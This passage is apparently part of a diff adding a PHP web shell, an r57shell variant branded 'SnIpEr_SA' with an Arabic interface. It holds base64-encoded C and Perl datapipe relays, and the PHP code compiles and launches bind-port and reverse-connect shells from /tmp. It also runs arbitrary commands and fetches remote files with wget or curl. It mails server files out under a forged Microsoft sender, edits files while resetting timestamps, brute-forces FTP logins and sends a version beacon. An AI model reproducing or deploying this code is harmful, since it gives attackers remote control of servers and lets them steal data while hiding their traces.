+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA 
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC 
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +if($unix) + { + if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; } + 
if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else
+ {
+ $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+ if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+ if(empty($sysctl)) { $sysctl = '-'; }
+ setcookie('sysctl',$sysctl);
+ }
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/r57shell_version/version.php?version=".$current_version."");}}
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<font face=Wingdings size=6><b>N</b></font><b>'.ws(2).'SnIpEr_SA </b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix)
+ {
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
+ }
+echo ws(2).$lb." 
<a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."الوضع الامن: <b>";
+echo (($safe_mode)?("<font color=#008000>فعال</font>"):("<font color=red>غير فعال</font>"));
+echo "</b>".ws(2);
+echo "اصدار البي اتش بي: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "الكيرل: <b>".(($curl_on)?("<font color=#008000>فعال</font>"):("<font color=red>غير فعال</font>"));
+echo "</b>".ws(2);
+echo "ماي سكل: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=#008000>فعال</font>"; } else { echo "<font color=red>غير فعال</font>"; }
+echo "</b>".ws(2);
+echo "ام اس سكل: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=#008000>فعال</font>";}else{echo "<font color=red>غير فعال</font>";}
+echo "</b>".ws(2);
+echo "بوست قري سكل: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=#008000>فعال</font>";}else{echo "<font color=red>غير فعال</font>";}
+echo "</b>".ws(2);
+echo "اوراكل: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=#008000>فعال</font>";}else{echo "<font color=red>مغلق</font>";}
+echo "</b><br>".ws(2);
+echo "الدوال الممنوعة : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>لايوجد</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."المساحة الخاليه : <b>".view_size($free)."</b> المساحة الكلية: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=#CCCCCC><b>uname -a :'.ws(1).'<br>sysctl 
:'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=#2279D9><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else
+ {
+ $filename = @basename($_POST['loc_file']);
+ $filedump = @fread($file,@filesize($_POST['loc_file']));
+ fclose($file);
+ $content_encoding=$mime_type='';
+ 
compress($filename,$filedump,$_POST['compress']);
+ $attach = array(
+ "name"=>$filename,
+ "type"=>$mime_type,
+ "content"=>$filedump
+ );
+ if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
+ if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+ $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+ {
+ case 'own':
+ @chown($_POST['param1'],$_POST['param2']);
+ break;
+ case 'grp':
+ @chgrp($_POST['param1'],$_POST['param2']);
+ break;
+ case 'mod':
+ @chmod($_POST['param1'],intval($_POST['param2'], 8));
+ break;
+ }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+ switch($_POST['what'])
+ {
+ case 'file':
+ if($_POST['action'] == "create")
+ {
+ if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+ else {
+ fclose($file);
+ $_POST['e_name'] = $_POST['mk_name'];
+ $_POST['cmd']="edit_file";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+ }
+ }
+ else if($_POST['action'] == "delete")
+ {
+ if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+ $_POST['cmd']="";
+ }
+ break;
+ case 'dir':
+ if($_POST['action'] == "create"){
+ if(mkdir($_POST['mk_name']))
+ {
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td 
bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+ }
+ else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+ }
+ else if($_POST['action'] == "delete"){
+ if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+ $_POST['cmd']="";
+ }
+ break;
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." 
\">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." 
...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+ $_POST['dir']."/".$nfn)
+ or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." 
-o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); }
+ else
+ {
+ if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+ else
+ {
+ if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
+ if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
+ }
+ }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+ $d=@dir($dir);
+ if ($d)
+ {
+ while (false!==($file=$d->read()))
+ {
+ if ($file=="." 
|| $file=="..") continue;
+ @clearstatcache();
+ list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+ if(!$unix){
+ echo date("d.m.Y H:i",$mtime);
+ if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
+ }
+ else{
+ $owner = @posix_getpwuid($uid);
+ $grgid = @posix_getgrgid($gid);
+ echo $inode." ";
+ echo perms(@fileperms($file));
+ printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+ echo date("d.m.Y H:i ",$mtime);
+ }
+ echo "$file\n";
+ }
+ $d->close();
+ }
+ else echo $lang[$language._text29];
+ break;
+ case 'test1':
+ $ci = @curl_init("file://".$_POST['test1_file']."");
+ $cf = @curl_exec($ci);
+ echo $cf;
+ break;
